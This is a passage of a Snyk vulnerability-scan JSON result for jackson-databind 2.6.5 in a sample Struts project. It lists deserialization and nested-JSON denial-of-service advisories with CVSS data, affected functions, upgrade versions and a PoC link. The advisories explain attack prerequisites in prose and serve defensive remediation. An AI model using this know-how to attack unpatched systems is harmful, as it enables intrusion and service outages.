([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", - "epssDetails": { - "percentile": "0.74700", - "probability": "0.00431", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-20190" - ], - "CWE": [ - "CWE-502", - "CWE-918" - ], - "GHSA": [ - "GHSA-5949-rw7g-wx7w" - ], - "RHSA": [ - "RHSA-1610966837463990" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-18T12:50:16.466618Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-18T17:23:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:17.193594Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9)", - "[2.8.0,2.8.11.4)", - "[2.7.0,2.7.9.6)", - "[,2.6.7.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9", - "2.8.11.4", - "2.7.9.6", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2326", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", - "title": "Github Release Tag" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12086", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:55.897269Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", - "epssDetails": { - "percentile": "0.74218", - "probability": "0.00415", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12086" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5ww9-j83m-q7qx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-05-19T10:19:10.287403Z", - "functions_new": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-17T18:12:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-05-17T18:12:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.785293Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.12.6.1", - "2.13.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when using nested objects." - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", - "className": "UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2816", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/3416", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.056720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", - "epssDetails": { - "percentile": "0.60309", - "probability": "0.00218", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36518" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-03-11T13:26:43.073121Z", - "functions_new": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-11T13:18:25Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-03-11T14:24:04Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.929583Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3582", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.201956Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", - "epssDetails": { - "percentile": "0.66401", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42004" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:21:18.588353Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:07:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T10:05:31.043255Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.261115Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", - "title": "Chromium Bugs" - }, - { - "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", - "title": "Documentation" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3590", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.284440Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub 